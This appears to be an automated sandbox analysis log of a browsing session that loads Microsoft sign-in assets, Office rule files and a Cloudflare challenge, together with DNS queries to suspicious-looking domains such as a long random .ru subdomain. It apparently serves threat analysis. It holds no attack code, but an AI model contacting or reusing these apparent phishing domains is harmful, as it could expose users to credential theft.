Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule230104v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230157v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230158v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230162v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230164v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/microsoft_logo_564db913a7fa0ca42727161c6d031bef.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule230165v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule230166v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230168v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230167v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230169v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230170v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1Host: aadcdn.msftauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule230171v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230173v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://login.microsoftonline.com/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule230172v1s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule230174v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule120119v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule224900v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704101v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704100v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1Host: aadcdn.msauth.netConnection: keep-aliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: */*Sec-Fetch-Site: noneSec-Fetch-Mode: corsSec-Fetch-Dest: emptyAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /rules/rule704201v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704200v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704151v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule704150v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficHTTP traffic detected: GET /rules/rule226009v0s19.xml HTTP/1.1Connection: Keep-AliveAccept-Encoding: gzipUser-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)Host: otelrules.azureedge.net
Source: global trafficDNS traffic detected: DNS query: karaokebooks.net
Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: www.google.com
Source: global trafficDNS traffic detected: DNS query: j9lg.xbyhiqbjl.com
Source: global trafficDNS traffic detected: DNS query: code.jquery.com
Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: a.nel.cloudflare.com
Source: global trafficDNS traffic detected: DNS query: 0rela6wr6r9khl50cbgjotcbwa8davihjy3a64rapf6i1hzopzenn.avzcafe.ru
Source: global trafficDNS traffic detected: DNS query: teams.nel.measure.office.net
Source: global trafficDNS traffic detected: DNS query: login.microsoftonline.com
Source: global trafficDNS traffic detected: DNS query: aadcdn.msftauth.net
Source: unknownHTTP traffic detected: POST /cdn-cgi/challenge-platform/h/b/flow/ov1/487456068:1733246749:egPdjpMoJzfojSsctpNbepGP0MyEt9rjP3lowltZDOM/8ec5727f9d0241a1/xoj21sG.TgNYar2CTssEEZiD57H0pWQOKcnFFHsf_L0-1733248732-1.1.1.1-3806Ch6yrCyiGSADZ7Q5vE1UuMqEvbi58GgHh_28sc7_EOrCh7HNPU4l8oRObyeS HTTP/1.1Host: challenges.cloudflare.comConnection: keep-aliveContent-Length: 3112sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Content-type: application/x-www-form-urlencodedCF-Chl-RetryAttempt: 0sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36CF-Challenge: xoj21sG.TgNYar2CTssEEZiD57H0pWQOKcnFFHsf_L0-1733248732-1.1.1.1-3806Ch6yrCyiGSADZ7Q5vE1UuMqEvbi58GgHh_28sc7_EOrCh7HNPU4l8oRObyeSsec-ch-ua-platform: "Windows"Accept: */*Origin: https://challenges.cloudflare.comSec-Fetch-Site: same-originSec-Fetch-Mode: corsSec-Fetch-Dest: emptyReferer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/b/turnstile/if/ov2/av0/rcv0/0/wazli/0x4AAAAAAAzBGuy5s2mdElBv/auto/fbE/normal/auto/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:58:54 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeCache-Control: max-age=14400Age: 9335Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CdnBrsWGj%2Bueme9ecI62U2U%2B6XBPDLZtOkNaz4fAfDM12yYZCaWputbDAblYwu3T8lkLLf0BF83gyBlFbn1N1dHJugNeLwGEDpmnRA3whwB9SY%2BWDn8Cd9uC9K%2BSlg%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Vary: Accept-Encodingalt-svc: h3=":443"; ma=86400server-timing: cfL4;desc="?proto=TCP&rtt=35824&min_rtt=35754&rtt_var=13458&sent=4&recv=7&lost=0&retrans=0&sent_bytes=2825&recv_bytes=2245&delivery_rate=79655&cwnd=181&unsent_bytes=0&cid=dc4b1aad5cbcd5c9&ts=59&x=0"CF-Cache-Status: HITServer: cloudflareCF-RAY: 8ec57290fe9e42ab-EWRserver-timing: cfL4;desc="?proto=TCP&rtt=2080&min_rtt=2078&rtt_var=784&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1898&delivery_rate=1390476&cwnd=193&unsent_bytes=0&cid=f6f28e720414ceb6&ts=9919&x=0"
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:58:59 GMTContent-Type: application/jsonContent-Length: 7Connection: closecache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0cf-chl-out: NRQugInQ2q58j2bXw9RBKcWN6INpg+ZPjCk=$LvNiw+IXGrr5wNKvServer: cloudflareCF-RAY: 8ec572ab8fd64321-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:59:06 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: jAlfgHJx4m8dQwNZJHkcQyJuGXe8O7YVcG4=$RgBUuQ1QJbSH9QAdcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8ec572d72eee32c7-EWRalt-svc: h3=":443"; ma=86400
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Tue, 03 Dec 2024 17:59:12 GMTContent-Type: application/jsonContent-Length: 7Connection: closecf-chl-out: an19KthvZnQPOg3zPsLI4zVgdje8T+aAasI=$XkHb/gRY6L0kbO2bcache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Server: cloudflareCF-RAY: 8ec572fc2c67efa1-EWRalt-svc: h3=":443"; ma=86400
Source: chromecache_734.2.dr, chromecache_778.2.drString found in binary or memory: http://feross.org
Source: chromecache_915.2.dr, chromecache_521.2.dr, chromecache_890.2.dr, chromecache_537.2.drString found in binary or memory: http://knockoutjs.com/
Source: chromecache_499.2.dr, chromecache_645.2.drString found in binary or memory: http://schema.skype.com/CodeBlockEditor
Source: chromecache_514.2.dr, chromecache_672.2.drString found in binary or memory: http://www.ecma-international.org/publications/files/ECMA-ST/ECMA-404.pdf).
Source: chromecache_915.2.dr, chromecache_521.2.dr, chromecache_890.2.dr, chromecache_537.2.drString found in binary or memory: http://www.opensource.org/licenses/mit-license.php)
Source: chromecache_738.2.dr, chromecache_809.2.drString found in binary or memory: https://aka.ms/mcpgaps
Source: chromecache_724.2.dr, chromecache_764.2.drString found in binary or memory: https://aka.ms/producerlearnmore
Source: chromecache_724.2.dr, chromecache_764.2.drString found in binary or memory: https://aka.ms/teamshost/?liveevent=true&tenantId=
Source: chromecache_724.2.dr, chromecache_764.2.drString found in binary or memory: https://aka.ms/teamsliveauditorium
Source: chromecache_571.2.drString found in binary or memory: https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.0.0/crypto-js.min.js
Source: chromecache_920.2.dr, chromecache_734.2.dr, chromecache_813.2.dr, chromecache_915.2.dr, chromecache_521.2.dr, chromecache_890.2.dr, chromecache_647.2.dr, chromecache_778.2.dr, chromecache_537.2.drString found in binary or memory: https://github.com/douglascrockford/JSON-js
Source: chromecache_631.2.dr, chromecache_695.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/118046-b79764f5406c6892.js.map
Source: chromecache_773.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/119068-f15e591f2b30bed1.js.map
Source: chromecache_848.2.dr, chromecache_760.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/120951-1965c2e12a30acee.js.map
Source: chromecache_789.2.dr, chromecache_609.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/129917-4d360edd57ebd485.js.map
Source: chromecache_693.2.dr, chromecache_879.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/13290-ac75815148d48467.js.map
Source: chromecache_849.2.dr, chromecache_750.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/151748-7ed0b00a4edf9dcd.js.map
Source: chromecache_592.2.dr, chromecache_504.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/164175-1980a13e9bd6c49d.js.map
Source: chromecache_749.2.dr, chromecache_692.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/166017-2ac8e8df661d5d48.js.map
Source: chromecache_722.2.dr, chromecache_639.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/169767-cde234dc0bbb0b5b.js.map
Source: chromecache_733.2.dr, chromecache_501.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/170464-a41687f997fee720.js.map
Source: chromecache_473.2.dr, chromecache_769.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/172435-9e8e82784ba66b95.js.map
Source: chromecache_730.2.dr, chromecache_483.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/183153-1c9db25c40ee158a.js.map
Source: chromecache_831.2.dr, chromecache_508.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/18785-695c74004d5eb524.js.map
Source: chromecache_668.2.dr, chromecache_519.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/192699-192c894d6acbddef.js.map
Source: chromecache_908.2.dr, chromecache_843.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/193021-fdd3ae78b36e898a.js.map
Source: chromecache_480.2.dr, chromecache_655.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/19528-b6fec175b219cd79.js.map
Source: chromecache_887.2.dr, chromecache_540.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/196395-04975d44a0a148a8.js.map
Source: chromecache_671.2.dr, chromecache_563.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/204348-6c2a726c296c1d1e.js.map
Source: chromecache_891.2.dr, chromecache_888.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/208766-422165fd3b0a4243.js.map
Source: chromecache_788.2.dr, chromecache_551.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/214218-d26bcec144ea0bad.js.map
Source: chromecache_607.2.dr, chromecache_818.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/215111-2951feaff7545a06.js.map
Source: chromecache_917.2.dr, chromecache_532.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/221963-5e2af34f8bc6a49a.js.map
Source: chromecache_919.2.dr, chromecache_646.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/224316-24c285ed94067094.js.map
Source: chromecache_814.2.dr, chromecache_800.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/230194-3ee389bad57950c5.js.map
Source: chromecache_653.2.dr, chromecache_822.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/232042-5e4b6be533bec974.js.map
Source: chromecache_771.2.dr, chromecache_670.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/233940-74cf9f018d3d63e1.js.map
Source: chromecache_642.2.dr, chromecache_853.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/237080-52321579da5a9d19.js.map
Source: chromecache_795.2.dr, chromecache_531.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/266580-a896ed3c565f3b61.js.map
Source: chromecache_583.2.dr, chromecache_628.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/268910-5348284eff7cf7d6.js.map
Source: chromecache_872.2.dr, chromecache_748.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/27001-fe02db0f643f10d6.js.map
Source: chromecache_550.2.dr, chromecache_515.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/273198-072882987da06b97.js.map
Source: chromecache_761.2.dr, chromecache_528.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/2754-647e8ddd158555f8.js.map
Source: chromecache_782.2.dr, chromecache_496.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/283032-49ed3292ba6ccaf2.js.map
Source: chromecache_620.2.dr, chromecache_776.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/295416-2f0a50be22e0bd2f.js.map
Source: chromecache_906.2.dr, chromecache_911.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/296222-7353105a2ca8e337.js.map
Source: chromecache_644.2.dr, chromecache_909.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/299770-19f9009717d80418.js.map
Source: chromecache_517.2.dr, chromecache_839.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/317907-347839a259769f33.js.map
Source: chromecache_513.2.dr, chromecache_902.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/320494-2b2c2ed38e54aa75.js.map
Source: chromecache_880.2.dr, chromecache_874.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/326041-fdfc59addb335cea.js.map
Source: chromecache_538.2.dr, chromecache_731.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/334217-424fbc14c44cda15.js.map
Source: chromecache_677.2.dr, chromecache_594.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/336776-b73125696b681791.js.map
Source: chromecache_484.2.dr, chromecache_743.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/337355-53949d9632bb831d.js.map
Source: chromecache_855.2.dr, chromecache_587.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/33834-5ec43dff5d85c08b.js.map
Source: chromecache_637.2.dr, chromecache_802.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/34655-8b85948394fbbcc5.js.map
Source: chromecache_811.2.dr, chromecache_702.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/349794-d314feeffba7a267.js.map
Source: chromecache_506.2.dr, chromecache_622.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/355005-7a1c934ed84f1ff3.js.map
Source: chromecache_661.2.dr, chromecache_797.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/364713-5477fa15c06c0013.js.map
Source: chromecache_907.2.dr, chromecache_876.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/367927-44fa44710376bb7a.js.map
Source: chromecache_555.2.dr, chromecache_701.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/370494-2a1675e78ae9629b.js.map
Source: chromecache_477.2.dr, chromecache_772.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/372599-680e6f16dbfe58e8.js.map
Source: chromecache_736.2.dr, chromecache_545.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/378200-f58c4c12c400a26d.js.map
Source: chromecache_767.2.dr, chromecache_756.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/381452-be282a834691e600.js.map
Source: chromecache_710.2.dr, chromecache_894.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/387552-8425a3283a90f51e.js.map
Source: chromecache_570.2.dr, chromecache_924.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/400532-1289d8a90e3671ce.js.map
Source: chromecache_777.2.dr, chromecache_636.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/40790-c113489658672afc.js.map
Source: chromecache_905.2.dr, chromecache_573.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/411326-fee4befbdfec8c54.js.map
Source: chromecache_881.2.dr, chromecache_659.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/412417-b3da2627a5108e3b.js.map
Source: chromecache_812.2.dr, chromecache_860.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/415696-84aae4e642014140.js.map
Source: chromecache_783.2.dr, chromecache_707.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/416397-1c547cab2265aa75.js.map
Source: chromecache_703.2.dr, chromecache_785.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/417548-aa8c7d7584ee7aca.js.map
Source: chromecache_611.2.dr, chromecache_858.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/418261-c0ca625c703c4b8b.js.map
Source: chromecache_779.2.dr, chromecache_666.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/420340-fadd8cd32aedf874.js.map
Source: chromecache_696.2.dr, chromecache_568.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/425104-7f05ec4bfb91b2a4.js.map
Source: chromecache_534.2.dr, chromecache_869.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/428348-eca109e63880cadf.js.map
Source: chromecache_739.2.dr, chromecache_618.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/441408-59c7bce56597ae49.js.map
Source: chromecache_641.2.dr, chromecache_820.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/455485-9eeec0dc31ad317f.js.map
Source: chromecache_524.2.dr, chromecache_533.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/459872-6142424fcf6e95ed.js.map
Source: chromecache_921.2.dr, chromecache_857.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/461500-40313a0738d76fdf.js.map
Source: chromecache_651.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/468376-9ab9597f558e2998.js.map
Source: chromecache_474.2.dr, chromecache_580.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/477986-5fa25e5ae7024e18.js.map
Source: chromecache_585.2.dr, chromecache_763.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/487132-ea50a7e46f75ed5b.js.map
Source: chromecache_717.2.dr, chromecache_588.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/492696-55b16e88aaa4fe43.js.map
Source: chromecache_865.2.dr, chromecache_516.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/49749-fa07bf3bd120c3c7.js.map
Source: chromecache_593.2.dr, chromecache_851.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/499319-ba112383185f5946.js.map
Source: chromecache_548.2.dr, chromecache_740.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/500479-7d013a411c09d21b.js.map
Source: chromecache_833.2.dr, chromecache_886.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/505772-1af27dc373b0b4e5.js.map
Source: chromecache_753.2.dr, chromecache_503.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/517259-c27e3a224439a3ec.js.map
Source: chromecache_624.2.dr, chromecache_889.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/52085-5ca564432872e7e0.js.map
Source: chromecache_824.2.dr, chromecache_726.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/52196-c82deace0372cca0.js.map
Source: chromecache_512.2.dr, chromecache_792.2.drString found in binary or memory: https://local.teams.office.com/sourcemaps/hashed-assets/526413-8a95c600f1d95ec1.js.map
